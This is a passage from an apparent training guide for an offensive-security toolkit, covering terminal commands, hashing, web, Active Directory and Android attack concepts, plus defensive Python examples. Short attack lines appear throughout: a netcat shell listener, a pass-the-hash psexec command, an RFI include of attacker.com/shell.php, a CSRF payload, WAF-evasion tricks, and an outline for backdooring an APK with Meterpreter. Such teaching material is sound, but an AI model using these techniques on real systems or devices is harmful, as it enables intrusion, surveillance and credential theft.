ping -c4 192.168.1.1   # Test connectivity (4 packets)
traceroute 8.8.8.8     # Trace route to destination
curl -I https://site.com  # Fetch just HTTP headers
wget https://site.com/file -O local.file  # Download file
nc -lvnp 4444          # Start netcat listener on port 4444 (catch shells here)
nc 192.168.1.50 4444   # Connect to remote host:port

Process and Permissions

ps aux                 # List all running processes
ps aux | grep python3  # Find specific process
kill -9 PID            # Force kill process by PID
sudo command           # Run command as root (you'll need this for nmap -sS)
sudo -l                # List what you can run as sudo (useful post-exploit)
chmod +x script.sh     # Make script executable
chmod 700 file         # Owner can read/write/execute, others: nothing
id                     # Show your current user ID and groups
whoami                 # Just your username
su - alice             # Switch to user alice (if you know the password)
# "uid=0(root)" in id output = you have root / full control

Package Management (Install Tools)

# Arch / CachyOS (VANTA's primary platform):
sudo pacman -S nmap    # Install nmap
yay -S apktool         # Install from AUR (community packages)
sudo pacman -Syu       # Update all packages

# Kali / Debian / Ubuntu:
sudo apt update        # Refresh package list first
sudo apt install nmap  # Install nmap
sudo apt install -y metasploit-framework  # Install Metasploit

# Python packages (any distro):
pip3 install frida-tools        # Install Python package
pip3 install --break-system-packages impacket  # Override the externally-managed-environment guard (PEP 668); a virtualenv avoids the need for it

08 Cryptography Essentials

Crypto From Zero

Cryptography appears in every VANTA module — password hashes in AD attacks, APK signing, TLS in Meterpreter's HTTPS transport, WPA2's 4-way handshake. You don't need to implement crypto, but you need to understand what hashes are, why symmetric and asymmetric encryption differ, and how TLS protects (and doesn't protect) network traffic.

Hashing — One-Way Functions

What is a Hash?
A hash function takes any input and produces a fixed-size output. It's one-way: you can't reverse a hash back to the input (mathematically). Same input always produces same output. Different input produces completely different output.
sha256("password") = 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a...
sha256("Password") = e7cf3ef4f17c3999a94f2c6f612e8a888e5b1026878e4e1939...
                     # One capital letter → completely different hash
How Passwords are Stored
  • Websites store the hash of your password, not the password itself
  • At login: hash your input, compare to stored hash. Never compare plain text.
  • NTLM hash (Windows AD): MD4(UTF-16LE(password)) — fast to compute, fast to crack
  • bcrypt/scrypt/Argon2 (modern web): intentionally slow — 100ms/hash → brute force impractical
  • WPA2 PMK: PBKDF2(password, SSID, 4096 rounds) — why WiFi cracking needs GPU
  • Cracking = try millions of passwords, hash each, compare to stolen hash
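
The storage schemes in the list above, side by side, as an added Python example (not VANTA code): a fast unsalted hash next to a salted, deliberately slow one with constant-time verification, plus the WPA2 PMK derivation. The record format, the iteration count, and the function names are this example's assumptions; HMAC-SHA1 with a 32-byte output is the PBKDF2 variant WPA2 uses.

```python
import hashlib
import hmac
import os

# Assumption for this example: an iteration count in line with current
# PBKDF2-HMAC-SHA256 guidance. Tune it to your hardware and latency budget.
ITERATIONS = 600_000


def fast_unsalted(password: str) -> str:
    """The weak scheme: one fast, unsalted SHA-256. Equal passwords give equal
    hashes, so a single precomputed table covers every account sharing one."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str) -> str:
    """Salted, deliberately slow hash stored as algo$iterations$salt$digest."""
    salt = os.urandom(16)  # unique per record, stored beside the digest
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Re-derive with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        rounds = int(iterations)
    except ValueError:
        return False  # malformed record: fail closed
    if algo != "pbkdf2_sha256" or rounds < 1:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    # compare_digest does not return early at the first differing byte,
    # so response time does not leak how much of the digest matched.
    return hmac.compare_digest(candidate, expected)


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2 pairwise master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds.
    The SSID salt means a table built for one network name does not transfer
    to another, and 4096 rounds make every guess cost 4096 times more."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


if __name__ == "__main__":
    print("unsalted, same input twice:",
          fast_unsalted("password") == fast_unsalted("password"))
    first, second = hash_password("hunter2"), hash_password("hunter2")
    print("salted, same input twice :", first == second)
    print("verify correct / wrong   :",
          verify_password("hunter2", first), verify_password("hunter3", first))
    print("PMK for the test network :", wpa2_pmk("password", "IEEE").hex())
```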
Hash in Windows AD
## NTLM hash format in secretsdump output:
Administrator:500:LM_HASH:NT_HASH:::
                   ↑        ↑
                   │        └─ NT hash (MD4 of UTF-16LE password)
                   └────────── LM hash (old, often disabled)

## Pass-the-Hash: authenticate with the NT hash directly
## No need to crack it — Windows NTLM protocol accepts the hash
python3 psexec.py -hashes :NT_HASH_HERE domain/User@target

Symmetric vs Asymmetric Encryption

Symmetric (AES)
One key encrypts AND decrypts. Both sides must share the key before communicating. Fast — used to encrypt actual data (files, traffic).

AES-256: 256-bit key. The most common. Used in WPA2 (CCMP), TLS data encryption, BitLocker, APK signing (after key exchange).
Asymmetric (RSA / ECDSA)
Two mathematically linked keys: a public key (share with everyone) and a private key (keep secret). Encrypt with public → only private key can decrypt. Sign with private → anyone with public key can verify.

Used in: TLS certificate exchange, APK signing (Android), SSH key authentication, code signing.
TLS / HTTPS
TLS combines both: asymmetric to exchange a symmetric session key securely, then symmetric to encrypt all data.

Why Meterpreter HTTPS bypasses firewalls: traffic is valid TLS on port 443. Without decrypting TLS, firewalls see normal HTTPS — they can't inspect the Meterpreter TLV payload inside.

Base64 — Encoding vs Encryption

Base64 is not encryption — it's an encoding scheme that converts binary data to printable ASCII characters. Anyone can decode it instantly with no key. It's used to safely carry binary data through text-only channels (email, URLs, XML, PowerShell). badusb uses base64 to embed PowerShell scripts in DuckyScript; Android payloads use it to hide shell commands in APK resource files.
# Base64 encode/decode on Linux:
echo "id; whoami" | base64          # → aWQ7IHdob2FtaQo=
echo "aWQ7IHdob2FtaQo=" | base64 -d # → id; whoami

# In PowerShell (Windows — badusb uses this):
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("id; whoami"))
# → Note: PowerShell's -EncodedCommand uses UTF-16LE, not UTF-8

# Detect base64 in the wild: length divisible by 4, only [A-Za-z0-9+/=] chars
# Always decode suspicious base64 strings you find in web apps, APKs, scripts
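One way to apply those two detection rules when triaging logs or scripts, as an added Python example that is not part of the toolkit: it finds base64-shaped tokens and tries both UTF-8 and the UTF-16LE form that -EncodedCommand uses. The sample lines and the 90% printable-text threshold are constructed for the demo.

```python
import base64
import binascii
import re

ALPHABET = r"A-Za-z0-9+/"
# At least three full 4-character groups, an optional padded final group, and no
# base64 characters on either side, so every match has a length divisible by 4.
B64_TOKEN = re.compile(
    rf"(?<![{ALPHABET}=])(?:[{ALPHABET}]{{4}}){{3,}}"
    rf"(?:[{ALPHABET}]{{2}}==|[{ALPHABET}]{{3}}=)?(?![{ALPHABET}=])"
)


def _printable_ratio(text: str) -> float:
    if not text:
        return 0.0
    ok = sum(1 for ch in text if ch.isprintable() or ch in "\r\n\t")
    return ok / len(text)


def decode_candidate(token: str):
    """Return (encoding, text) if the token decodes to readable text, else None."""
    if len(token) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    # ASCII text stored as UTF-16LE has 0x00 in every second byte.
    if len(raw) >= 4 and len(raw) % 2 == 0 and raw[1::2].count(0) == len(raw) // 2:
        text = raw.decode("utf-16-le", errors="replace")
        if _printable_ratio(text) > 0.9:
            return ("utf-16-le", text)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None          # binary data or a false positive such as a file path
    return ("utf-8", text) if _printable_ratio(text) > 0.9 else None


def find_encoded_strings(blob: str):
    """Return [(token, encoding, decoded_text), ...] for every readable hit."""
    hits = []
    for match in B64_TOKEN.finditer(blob):
        decoded = decode_candidate(match.group(0))
        if decoded:
            hits.append((match.group(0), *decoded))
    return hits


def build_sample() -> str:
    """Constructed log/script lines for the demo; nothing here is real telemetry."""
    ps_blob = base64.b64encode("Get-Process".encode("utf-16-le")).decode()
    return "\n".join([
        f'cmd="powershell.exe -NoProfile -EncodedCommand {ps_blob}"',
        "script: echo aWQ7IHdob2FtaQo= | base64 -d",
        "GET /index.html HTTP/1.1",
    ])


if __name__ == "__main__":
    for token, encoding, text in find_encoded_strings(build_sample()):
        print(f"{encoding:9s} {token[:24]:24s} -> {text!r}")
```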

09 Attacker's Mindset

Think Like a Red Teamer

The biggest difference between a script kiddie and a skilled pentester isn't the tools — it's the mental model. Understanding why attacks work makes you effective even when the tools fail, and makes your reports genuinely useful to the defenders.

Attack Surface Thinking
Every input is a potential injection point. Every open port is a potential entry. Every trust relationship is a potential lateral movement path. When you look at a system, ask: "what accepts input here, and what happens if that input is malicious?"
Assume Breach
Real red teams operate on the premise that the perimeter is already compromised. Don't stop at the first shell — go deeper. What can you reach from here? What credentials are in memory? Who else trusts this machine?
Least Resistance
Attackers don't exploit complex 0-days when a default password works. Always check the easy things first: default credentials, open ADB, unpatched services, misconfigured permissions. 80% of real breaches use known techniques.
Defense Evasion is Part of the Job
A payload that gets caught by AV is a failed operation. Understanding why tools get detected — signatures, behavioral heuristics, EDR hooks — teaches you how to evade them. Every VANTA module has an OPSEC section for this reason.
Read Error Messages
Error messages are a pentester's best friend. A verbose error from a web app may leak the database type, version, file paths, and query structure — more useful than a successful response. Never skip reading error output.
Document Everything
A pentest with no report is just unauthorized hacking. Every finding needs evidence: screenshots, command output, timestamps. VANTA's structured JSON output is designed to feed directly into professional reports.

Understanding Trust Relationships

# Trust is the core concept of all privilege escalation

Web server trusts:  user input in GET/POST parameters
                    → SQL injection, XSS, command injection

Android trusts:     apps installed with the right signature
                    → we re-sign a backdoored APK with our cert → Play Protect bypass

Windows AD trusts:  any authenticated domain account for LDAP enumeration
                    → low-priv user can enumerate entire domain structure

Kerberos trusts:    any account can request a TGS for any SPN
                    → Kerberoasting: request service ticket, crack it offline

SSH trusts:         key files in ~/.ssh/authorized_keys
                    → find a private key in a repo/config → ssh as that user

# Every trust relationship is a potential attack path
# Your job: find the shortest chain of trust relationships to your goal

10 Advanced Glossary

Deeper Terms — Protocol & Tool Level

Network Protocols
TCP 3-Way Handshake
The connection setup protocol: Client sends SYN → Server replies SYN-ACK → Client replies ACK. nmap SYN scan (-sS) only sends SYN — a port is open if it receives SYN-ACK, filtered if it receives nothing, closed if it receives RST.
DNS (Domain Name System)
Translates domain names (google.com) to IP addresses. Port 53 (UDP/TCP). Attackers use DNS as a C2 channel (DNS tunneling) since most firewalls allow outbound DNS. Out-of-band SQLi can exfiltrate data via crafted DNS queries.
DHCP (Dynamic Host Configuration)
Automatically assigns IP addresses to devices on a network. Port 67/68 (UDP). Rogue DHCP server attack: attacker's server responds faster than the real one, assigns victim a "default gateway" pointing to attacker → MITM all traffic.
ARP (Address Resolution Protocol)
Maps IP addresses to MAC addresses on a LAN. ARP has no authentication — ARP poisoning (spoofing) lets an attacker tell a victim "I am the router" to intercept traffic. Used in wifi_monitor's MITM mode.
ICMP (Ping Protocol)
Used to test connectivity (ping). Type 8 = echo request (ping), Type 0 = echo reply (pong). ICMP tunneling can carry data inside ping packets, bypassing firewalls that allow ICMP but block TCP/UDP.
TTL (Time To Live)
A counter in IP packets that decrements at each router hop. When TTL=0, the packet is dropped. Default: Linux = 64, Windows = 128, Cisco = 255. A response with TTL=127 → originated from a Windows machine (128-1=127 after one hop).
Binary Exploitation
Buffer Overflow
Writing more data into a fixed-size memory buffer than it can hold, overwriting adjacent memory. Classic attack: overwrite the return address on the stack to redirect execution to attacker-controlled code (shellcode). ctfpwn's stack_smash operation automates this.
ROP Chain (Return-Oriented Programming)
An exploitation technique that chains together existing code fragments ("gadgets") in a program to execute arbitrary operations, bypassing no-execute (NX/DEP) protections that prevent shellcode execution. ctfpwn's rop_build operation builds these automatically.
ASLR (Address Space Layout Randomization)
OS protection that randomizes where code, stack, and heap load in memory at each execution. Makes it harder to target fixed memory addresses in exploits. Bypassed via information leaks, brute force (32-bit), or format string vulnerabilities.
Shellcode
A small sequence of machine code (assembly language compiled to raw bytes) designed to spawn a shell when executed. Must be position-independent (no hardcoded addresses). Meterpreter's stager IS shellcode — it runs in memory, loads Stage 1, establishes C2.
Format String Vulnerability
When user input is passed directly as a printf format string: printf(user_input) instead of printf("%s", user_input). Input like %x %x %x leaks stack memory. %n writes to memory. Still found in embedded firmware and IoT devices.
PIE (Position Independent Executable)
When an executable is compiled as PIE, it can load at any base address (works with ASLR). Non-PIE binaries always load at a fixed address, making exploitation easier since you know where code is. checksec ./binary shows if PIE is enabled.
Web Security
Same-Origin Policy (SOP)
A browser security rule: JavaScript on site A cannot read responses from site B. An XSS payload runs within site A's origin, so it CAN read site A's cookies, DOM, and make authenticated requests to site A's API. That's why XSS is so dangerous.
CSRF (Cross-Site Request Forgery)
Tricks a victim's browser into making an authenticated request to a site where they're logged in. Example: victim visits attacker's page which has <img src="bank.com/transfer?to=attacker&amount=1000"> — browser sends the request with the victim's session cookie.
SSRF (Server-Side Request Forgery)
An attack where you make a server fetch a URL you specify. If the server can reach internal services (metadata APIs, databases, admin panels), you use SSRF to access them from the server's internal perspective. websec's ssrf operation tests for this.
WAF (Web Application Firewall)
A reverse proxy that inspects HTTP traffic for attack patterns. Blocks requests containing obvious SQLi/XSS payloads. Bypassed by encoding (%27 instead of '), case variation (SeLeCt), comment injection (SE/**/LECT), and HTTP parameter pollution. websec's waf_evasion mode applies these.
LFI / RFI (Local/Remote File Inclusion)
Vulnerabilities in PHP where user-controlled file paths are passed to include(). LFI: read local files (?page=../../etc/passwd). RFI: include a remote URL containing attacker's PHP code (?page=http://attacker.com/shell.php) — instant RCE if allow_url_include is on.
IDOR (Insecure Direct Object Reference)
Accessing resources by guessing/changing an ID parameter without authorization checks. /api/users/123/data → try /api/users/1/data (admin?). websec's idor_test operation increments/decrements IDs to find unauthorized access. One of the most common bug bounty findings.
Windows / Active Directory
Domain Controller (DC)
The Windows server that runs Active Directory. Stores all user accounts, passwords (as hashes), group memberships, and policies for the entire domain. Owning a DC = owning the entire organization. DCSync attack extracts all credentials from the DC without touching disk.
Kerberos Ticket (TGT / TGS)
TGT (Ticket-Granting Ticket): proof that you authenticated. Valid 10 hours by default. TGS (Ticket-Granting Service): a ticket for a specific service, encrypted with that service's key — this is what Kerberoasting steals. Golden Ticket: forged TGT using krbtgt hash — valid forever.
DCSync
An attack that replicates Active Directory credential data without touching the DC's files. Uses legitimate AD replication protocol (DS-Replication-Get-Changes-All permission). impacket's secretsdump.py implements this. Requires Domain Admin or replication permissions.
LSASS (Local Security Authority)
Windows process that handles authentication. Keeps copies of recently used credentials in memory — NTLM hashes, Kerberos tickets, and on older systems, plaintext passwords (WDigest). Dumping LSASS (via ProcDump, Task Manager, or Mimikatz) extracts these credentials.
ACL (Access Control List)
Permissions on AD objects. GenericAll = full control. WriteDACL = can modify permissions. WriteOwner = can take ownership. GenericWrite = can write any attribute. BloodHound maps ACL relationships — a chain of ACLs is often the path from a low-priv user to Domain Admin.
Lateral Movement
Moving from a compromised machine to other machines in the network using valid credentials, tickets, or protocol exploitation. Tools: PsExec (SMB), WMI, WinRM (PowerShell Remoting), RDP, DCOM. windowsAD's shell operation implements PsExec-style lateral movement.

12 The Terminal

What is a Terminal?

A terminal is a text interface to your operating system. Instead of clicking icons, you type commands. Every VANTA operation runs in a terminal. Understanding how terminals work is not optional — it is the bedrock of offensive security.

Terminal vs Shell vs Console

Terminal
The window that displays text. Examples: GNOME Terminal, iTerm2, Windows Terminal, Alacritty. The terminal itself is just a renderer — it shows what the shell outputs.
Shell
The program inside the terminal that reads your commands and executes them. Common shells: bash (most Linux), zsh (macOS default), sh (POSIX minimal), fish (feature-rich). Shells also run script files.
Console / TTY
A physical or virtual text device. In Linux you can switch to pure text mode TTYs with Ctrl+Alt+F2 through F6. SSH sessions give you a remote pseudo-TTY (PTY). VANTA's Shell tab is a PTY.

The Prompt — Reading It

user@hostname:~$          # normal user  ($ is the prompt character)
root@kali:/tmp#           # root user    (# means root — full system access)
┌──(kali㉿kali)-[~]
└─$                       # Kali Linux default prompt — same as above, styled

~ means your home directory (/home/username). The part after the colon is your current directory. When VANTA says "run this in your terminal," you paste it after the $ or #.

Essential Shell Concepts

stdin / stdout / stderr
Every process has 3 file descriptors: 0=input (keyboard), 1=output (screen), 2=errors. 2>/dev/null suppresses errors. >file redirects output to a file.
Pipe |
Takes stdout of one command and feeds it as stdin to the next. nmap 192.168.1.0/24 | grep open — only shows lines containing "open".
Background &
Appending & runs a command in the background so you get your prompt back. msfconsole -q & starts Metasploit without blocking your shell.
Environment Variables
export LHOST=192.168.1.10 sets a variable available to all child processes. echo $PATH shows where the shell looks for programs. env lists all current variables.
Wildcards / Glob
* matches anything: ls *.apk lists all APK files. ? matches one character. [abc] matches one of those chars.
Ctrl+C / Ctrl+Z
Ctrl+C sends SIGINT — stops most programs immediately. Ctrl+Z suspends the process (pause, not kill). fg brings it back. bg resumes it in background.

Superuser — What Root Means

root (UID 0) is the superuser — it can read, write, or delete any file on the system and run any command. Most VANTA operations that require hardware access (raw sockets, monitor mode, USB) need root. sudo command runs one command as root. sudo -i drops you into a root shell. Never run as root unless required — it's a security risk.
sudo python3 android_gui.py        # run as root (needed for raw ADB features)
sudo -i                            # become root in this shell (careful)
whoami                             # shows your current username
id                                 # shows uid, gid, and group memberships

13 OSI Model

How Networks Are Layered

The OSI model divides networking into 7 layers. Every tool in VANTA operates at specific layers. Knowing which layer you are attacking determines which tools and techniques apply.

Layer 7 — Application
Protocols users interact with: HTTP, HTTPS, DNS, FTP, SMTP, SSH. websec targets this layer — SQL injection, XSS, SSRF all live here. This is where business logic and authentication happen.
Layer 6 — Presentation
Encoding and encryption: TLS/SSL lives here. When an HTTPS connection is established, the TLS handshake happens at Layer 6. Certificate spoofing attacks target this layer.
Layer 5 — Session
Managing connections between apps. Session hijacking (stealing a user's authenticated session cookie to impersonate them) targets this layer. WebSockets operate here.
Layer 4 — Transport
TCP and UDP live here. Ports live here. SYN scans (the default nmap scan) craft raw TCP SYN packets to check if a port accepts connections — a Layer 4 operation.
Layer 3 — Network
IP addresses live here. Routing happens here. ICMP (ping) is a Layer 3 protocol. netrecon's host discovery sends ICMP packets to find live devices on a subnet.
Layer 2 — Data Link
MAC addresses and frames live here. ARP maps IP→MAC at this layer. mac_spoof operates at Layer 2 — changing your MAC address fools the network's view of which hardware is speaking.
Layer 1 — Physical
Actual radio waves, cables, and signals. WiFi (802.11) PHY headers live here. wifi_monitor puts your NIC in monitor mode to capture raw 802.11 frames — this is a Layer 1/2 operation.
Quick reference: where VANTA modules attack

Layer 7 (App):       websec — HTTP injection, SSRF, auth bypass
Layer 4 (Transport): netrecon — TCP SYN scan, port enumeration
Layer 3 (Network):   netrecon — ICMP discovery, traceroute
Layer 2 (Data Link): mac_spoof — ARP, MAC address spoofing
Layer 1 (Physical):  wifi_monitor — 802.11 monitor mode, deauth

14 DNS

How Names Become Numbers

DNS (Domain Name System) translates human-readable names like google.com into IP addresses like 142.250.80.14. Every pentest touches DNS — it reveals infrastructure, subdomains, and mail servers.

How a DNS Lookup Works (Step by Step)

You type:  https://example.com

1. Your OS checks its local cache — if it was looked up recently, done.
2. OS asks your configured DNS resolver (usually your router, e.g. 192.168.1.1)
3. Resolver asks a Root Nameserver: "Who handles .com?"
4. Root replies: "Ask 192.5.6.30 (a .com nameserver)"
5. .com nameserver replies: "Ask ns1.example.com for example.com"
6. ns1.example.com replies: "example.com = 93.184.216.34"
7. Your OS caches the answer (for the TTL seconds) and connects to 93.184.216.34

DNS Record Types — What They Mean

A Record
Maps a hostname to an IPv4 address. dig example.com A. The most common record. Most recon starts here.
AAAA Record
Maps a hostname to an IPv6 address. IPv6 addresses are 128 bits, written as 8 colon-separated hex groups: 2001:0db8:85a3::8a2e:0370:7334
MX Record
Mail eXchanger — which server handles email for this domain. Leaks email infrastructure. Phishing pretext builds often start with MX recon.
CNAME Record
Alias — points to another hostname. www.example.com → example.com. Subdomain takeover attacks exploit stale CNAMEs pointing to deprovisioned services.
TXT Record
Arbitrary text. Used for SPF (email auth), DKIM keys, and verification tokens. Often leaks internal tool names, cloud provider details, and subdomains in SPF includes.
PTR Record
Reverse DNS — maps IP → hostname. dig -x 8.8.8.8 returns dns.google. Useful for enriching scan output: a raw IP reveals its hostname.

DNS in Pentesting

dig example.com A               # A record lookup
dig example.com MX              # mail server
dig example.com TXT             # SPF/DKIM/verification records
dig example.com ANY             # all records (often blocked)
dig @8.8.8.8 example.com        # query specific resolver (Google's)

nslookup example.com            # Windows-friendly alternative

# Subdomain enumeration (find hidden services)
ffuf -w /usr/share/wordlists/subdomains.txt -u https://FUZZ.example.com

15 HTTP Protocol

How the Web Actually Works

HTTP (HyperText Transfer Protocol) is the language browsers and servers use to communicate. Every web vulnerability — SQLi, XSS, SSRF, IDOR — is the HTTP protocol being abused. You cannot do web security without understanding HTTP at the byte level.

The Request–Response Cycle

                   ┌─────────────────────────────────────┐
  Browser          │  HTTP Request                        │
  sends ──────────▶│  GET /login HTTP/1.1                 │
                   │  Host: example.com                   │
                   │  Cookie: session=abc123              │
                   │  User-Agent: Mozilla/5.0 ...         │
                   └─────────────────────────────────────┘

                   ┌─────────────────────────────────────┐
  Server           │  HTTP Response                       │
  replies ◀────────│  HTTP/1.1 200 OK                     │
                   │  Content-Type: text/html             │
                   │  Set-Cookie: session=xyz789          │
                   │                                      │
                   │  <html>...</html>                    │
                   └─────────────────────────────────────┘

HTTP Methods — What Each One Does

GET
Fetch a resource. Parameters in the URL: /search?q=hello. GET requests are logged in server logs and browser history — never put passwords in GET params.
POST
Send data to the server. Body is not in the URL. Used for form submissions, login, file uploads. Still visible in proxy tools like Burp Suite.
PUT / PATCH
Update a resource. REST APIs use PUT (full replace) and PATCH (partial update). Improper access control on these endpoints is a common finding.
DELETE
Remove a resource. If unauthenticated DELETE is allowed, an attacker can destroy data. Test: curl -X DELETE https://api.example.com/users/1
OPTIONS
Ask which methods the server allows on a resource. Used in CORS preflight checks. curl -X OPTIONS https://example.com/api -v reveals allowed methods.
HEAD
Same as GET but returns only headers, no body. Used to check if a resource exists without downloading it. Useful in automated recon to verify endpoints.

Status Codes You Must Know

200 OK                  — request succeeded, resource returned
301 / 302               — redirect (301=permanent, 302=temporary) — follow these in recon
400 Bad Request         — malformed request — check your payload syntax
401 Unauthorized        — auth required but not provided (no session/token)
403 Forbidden           — auth provided but permission denied — probe for bypasses
404 Not Found           — resource doesn't exist — or hidden (403 is more interesting)
405 Method Not Allowed  — server won't allow that HTTP method on this endpoint
500 Internal Error      — server crashed — often reveals error messages with code paths
502 Bad Gateway         — proxy/load balancer can't reach the backend
503 Service Unavailable — server intentionally unavailable (rate limit, maintenance)

Headers That Matter in Security

Cookie
Sent by browser every request. Contains session tokens, auth state. If stolen (XSS, MITM), attacker gets authenticated access. Look for Secure and HttpOnly flags.
Authorization
Bearer <token> for JWT auth. Basic <base64> for HTTP Basic. Basic auth is credentials as base64 — not encryption, trivially decoded.
Content-Type
Tells the server what format the request body is in. application/json, multipart/form-data (file upload), text/xml. Mismatched content types sometimes bypass WAFs.
X-Forwarded-For
Carries the original client IP behind a proxy. If the server trusts this header without validation, attackers can spoof their IP address to bypass IP-based rate limiting.
Server / X-Powered-By
Reveals software version: nginx/1.14.0, PHP/7.2.3. Version leaks let attackers look up CVEs for that exact version.
CORS Headers
Access-Control-Allow-Origin: * means any website can make cross-origin requests. If combined with cookies being sent, this is a critical misconfiguration.
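The header checks above, applied to a raw response (added example, not from the websec module): it flags cookies without Secure/HttpOnly, version strings in Server and X-Powered-By, and a wildcard CORS origin. Both responses are constructed samples, and the finding strings are this example's own wording.

```python
import re

VERSION_RE = re.compile(r"/\d+(?:\.\d+)+")      # matches nginx/1.14.0, PHP/7.2.3

# Constructed sample responses for the demo.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.14.0\r\n"
    "X-Powered-By: PHP/7.2.3\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=xyz789; Path=/\r\n"
    "Set-Cookie: theme=dark; Secure; HttpOnly; SameSite=Lax\r\n"
    "Access-Control-Allow-Origin: *\r\n"
    "\r\n"
    "<html>...</html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=xyz789; Path=/; Secure; HttpOnly; SameSite=Strict\r\n"
    "\r\n"
    "<html>...</html>"
)


def parse_headers(raw_response: str):
    """Return [(lowercased-name, value), ...] from a raw HTTP response."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = []
    for line in head.split("\n")[1:]:            # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_response(raw_response: str):
    """List header-level findings, in header order, then CORS."""
    headers = parse_headers(raw_response)
    findings = []
    for name, value in headers:
        if name in ("server", "x-powered-by") and VERSION_RE.search(value):
            findings.append(f"{name}: version disclosed ({value})")
        elif name == "set-cookie":               # one header per cookie
            parts = [p.strip() for p in value.split(";")]
            cookie = parts[0].split("=", 1)[0]
            flags = {p.split("=", 1)[0].lower() for p in parts[1:]}
            for flag in ("secure", "httponly"):
                if flag not in flags:
                    findings.append(f"cookie {cookie}: missing {flag} flag")
    single = dict(headers)
    origin = single.get("access-control-allow-origin")
    with_credentials = single.get("access-control-allow-credentials", "").lower() == "true"
    if origin == "*":
        findings.append("cors: Access-Control-Allow-Origin is *")
    elif origin and with_credentials:
        findings.append(f"cors: credentialed requests allowed from {origin}")
    return findings


if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(response) or "no findings")
```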

16 Android Security

How Android Apps Are Sandboxed

The android_pentest module operates against the Android security model. To understand what the module does and why each technique works (or doesn't), you need to understand how Android isolates apps and where the weaknesses are.

The Android Security Model

UID Isolation
Every installed app gets its own Linux user ID (UID). App A runs as UID 10042, App B as UID 10043. They cannot read each other's files in /data/data/ — enforced by standard Linux DAC. Root (UID 0) bypasses this entirely, which is why rooting is the first step in deep-dive testing.
APK Structure
An APK is a ZIP file. Inside: AndroidManifest.xml (app declaration, permissions, components), classes.dex (Dalvik bytecode — the compiled app logic), res/ (UI layouts, images, strings), lib/ (native .so files). apktool decodes all of this to human-readable form.
Permissions
Apps declare required permissions in the Manifest. Dangerous permissions (CAMERA, MICROPHONE, READ_CONTACTS, ACCESS_FINE_LOCATION) require runtime user approval (Android 6+). Normal permissions are auto-granted. The android_pentest backdoor requests specific permissions to enable the C2 capabilities.

Android Components — What Attackers Target

AndroidManifest.xml declares 4 component types:

  Activity     — a screen (UI). Exported activities can be launched by other apps or via ADB.
                 Attack: intent injection, exported activity access without auth

  Service      — background process. The Meterpreter backdoor runs as a Service.
                 Attack: exposed services, privilege escalation through service bindings

  BroadcastReceiver — responds to system or app events (BOOT_COMPLETED, SMS_RECEIVED).
                 Attack: boot persistence (register for BOOT_COMPLETED), intent sniffing

  ContentProvider — shared data store (contacts, photos). URI-accessible.
                 Attack: SQL injection via content URIs, exposed providers leaking data

How the android_pentest Backdoor Works

1. Target APK downloaded/obtained
2. apktool decodes APK → smali (assembly-level Android bytecode)
3. Payload smali files injected into decoded source
4. AndroidManifest.xml modified to add:
   - INTERNET, READ_PHONE_STATE, RECORD_AUDIO, CAMERA permissions
   - Service declaration for the C2 component
   - BOOT_COMPLETED receiver for persistence
5. APK recompiled and signed with our keystore
6. ADB installs the modified APK on target device
7. Meterpreter connects back to our handler (LHOST:LPORT)
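From the defender's side, the manifest changes in step 4 are what make a repackaged APK stand out. This added example (not part of android_pentest) diffs two apktool-decoded manifests and reports new permissions, components and boot receivers; the package name, class names and the scoring rule are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NAME = "{http://schemas.android.com/apk/res/android}name"
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"
# Permissions the steps above list as added during repackaging.
WATCHED = {"android.permission." + p
           for p in ("INTERNET", "READ_PHONE_STATE", "RECORD_AUDIO", "CAMERA")}

# Constructed manifests: a known-good build and a candidate claiming to be the same app.
BASELINE = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
  </application>
</manifest>
"""
CANDIDATE = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <service android:name=".sync.UpdateService" android:exported="true"/>
    <receiver android:name=".sync.BootReceiver" android:exported="true">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""


def summarize(manifest_xml: str) -> dict:
    """Collect permissions, declared components and boot-triggered receivers."""
    root = ET.fromstring(manifest_xml.strip())
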